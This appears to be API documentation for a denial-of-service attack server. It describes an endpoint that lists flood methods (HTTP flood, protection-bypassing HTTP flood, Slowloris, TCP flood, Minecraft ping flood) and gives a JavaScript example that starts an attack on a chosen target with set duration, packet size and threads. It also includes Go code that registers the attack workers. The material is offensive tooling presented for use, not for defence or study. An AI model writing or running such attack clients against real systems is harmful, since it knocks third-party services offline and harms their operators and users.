Skip to main content

Endpoint

GET /attacks
Returns a list of all registered attack methods available on the server.

Request

No parameters required.

Headers

Content-Type
string
Not required for GET requests

Response

attacks
string[]
required
Array of available attack method identifiers

Attack Method Types

The response includes these attack methods registered in the engine:
http_flood
string
Standard HTTP flood attack - sends rapid HTTP requests to overwhelm the target
http_bypass
string
HTTP flood with bypass techniques - includes various headers and techniques to bypass protection
http_slowloris
string
Slowloris connection exhaustion attack - keeps connections open with slow requests
tcp_flood
string
Raw TCP packet flood - sends TCP packets directly to the target
minecraft_ping
string
Minecraft server ping flood - targets Minecraft servers with ping packets

Example Request

curl http://localhost:8080/attacks

Example Response

{
  "attacks": [
    "http_flood",
    "http_bypass",
    "http_slowloris",
    "tcp_flood",
    "minecraft_ping"
  ]
}

Using Attack Methods

Once you’ve retrieved the list of available attacks, you can use any of these identifiers when starting an attack via Socket.IO: 
import { io } from 'socket.io-client';

const socket = io('http://localhost:8080');

// First, get available attacks
fetch('http://localhost:8080/attacks')
  .then(res => res.json())
  .then(data => {
    console.log('Available attacks:', data.attacks);
    
    // Start an attack using one of the methods
    socket.emit('startAttack', {
      target: 'http://example.com',
      attackMethod: data.attacks[0], // e.g., 'http_flood'
      duration: 60,
      packetDelay: 100,
      packetSize: 1024,
      threads: 4
    });
  });

Implementation Details

The attacks endpoint is implemented in /cmd/mmb-server/main.go:70-77: 
e.GET("/attacks", func(c echo.Context) error {
    kinds := reg.ListKinds()
    out := make([]string, 0, len(kinds))
    for _, k := range kinds {
        out = append(out, string(k))
    }
    return c.JSON(http.StatusOK, map[string]any{"attacks": out})
})
The attack methods are registered in the engine registry during server initialization: 
reg := engine.NewRegistry()
reg.Register(engine.AttackHTTPFlood, httpA.NewFloodWorker())
reg.Register(engine.AttackHTTPBypass, httpA.NewBypassWorker())
reg.Register(engine.AttackHTTPSlowloris, httpA.NewSlowlorisWorker())
reg.Register(engine.AttackTCPFlood, tcpA.NewFloodWorker())
reg.Register(engine.AttackMinecraftPing, mc.NewPingWorker())

Notes

The list of available attacks is determined at server startup and does not change during runtime. If you need to add custom attack methods, you must modify the server code and restart.
Use this endpoint to dynamically populate attack method selectors in your client application, ensuring compatibility with the server’s capabilities.

Build docs developers (and LLMs) love

Get started for freeTalk to us